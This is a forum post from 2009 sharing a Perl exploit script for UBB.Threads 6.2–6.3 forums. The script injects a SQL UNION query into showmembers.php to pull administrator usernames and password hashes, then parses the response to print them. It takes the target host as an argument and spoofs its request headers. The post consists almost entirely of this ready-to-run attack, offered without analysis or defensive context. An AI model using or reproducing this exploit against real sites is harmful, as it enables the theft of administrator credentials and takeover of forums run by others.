UBB.Threads 6.2.*-6.3.* exploit for admin hash viewing

aka_kludge

Дата: Четверг, 29.10.2009, 22:24 | Сообщение # 1

Admin

Группа: Администраторы

Сообщений: 1058

Награды: 2

Репутация: 25

Статус: Offline

Code

#!/usr/bin/perl
use IO::Socket;

########################################
## UBBThreads exploit for admin hash viewing ##
## SQL-injection ##
## coded by ziGGy and Satyr ##
## Bugs found by w00t
##Gr33t1ngz to:Khmelic;Skr4tch;Mazafaka.ru;d.o.b familia;4nd 3v3ry b0dy wh0 kn0w$ u$##
##$0rry f0r 7t1$ 31337 $p34k1ng =P##
## http://www.cyberlords.net ##
########################################

if (@ARGV < 2)
{
print "#############################################################\n";
print " UBB.Threads 6.2.*-6.3.* exploit for admin hash viewing\n";
print " coded by ziGGy and Satyr\n";
print " Cyber Lords Community http://www.cyberlords.net\n";
print "#############################################################\n";
print " Usage:\n";
print " cl_ubb.pl <host> </folder/> \n";
print "\n";
print " <host> - host for attacking\n";
print " </folder/> - UBBThreads folder\n";
print "#############################################################\n";
exit();
}
$server = $ARGV[0];
$folder = $ARGV[1];
print "\n";
print "server : $server\n";
print "folder : $folder\n";
print "\n";
$success = 0;
$path_download=
"showmembers.php?Cat=&like=1'%20union%20SELECT%20U_LoginName,U_Registered,U_Extra1,U_Password,U_TotalPosts,U_Extra1,U_Number%20FROM%20w3t_Users%20WHERE%20U_Status ='Administrator'/*";
$GET = $folder . $path_download;
print " Connecting...\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") ||
die "Connection died\n";
print "Connected!\n";
print "Sending...\n";
print $socket "GET $GET HTTP/1.1\n";
print $socket "Host: $server\n";
#print $socket "Accept: */*\n";
print $socket "Http-Referer: http://microsoft.com\n";
print $socket "User-Agent: Internet Explorer 6.0\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Connection: close\n\n";
print "Success!\n";
print "Hold on...\n\n";

$start=0;
$href_num=0;
$next_str_name=0;
$all_count=0;
while ($answer = <$socket>)
{

     if($next_str_name eq 1){print $answer;$next_str_name=0;}
     if($answer=~/CODE LOOP/gi){$start=1;}
     if($answer=~/END OF LOOP/gi){$start=0;break;}

     if($start eq 1){
         if($answer=~/<a href/){
             $href_num++;
             if($href_num % 2 eq 0){
                 $answer=~s/http:\/\///gi;
                 $answer=~/<a href="(.+)" target="new">/gi;
                 print $1."\n\n";$all_count++;
             }
             else{
                 $next_str_name=1;
             }
         }
     }

}
if ($all_count == 0) { print "exploit failed!!!\n"; }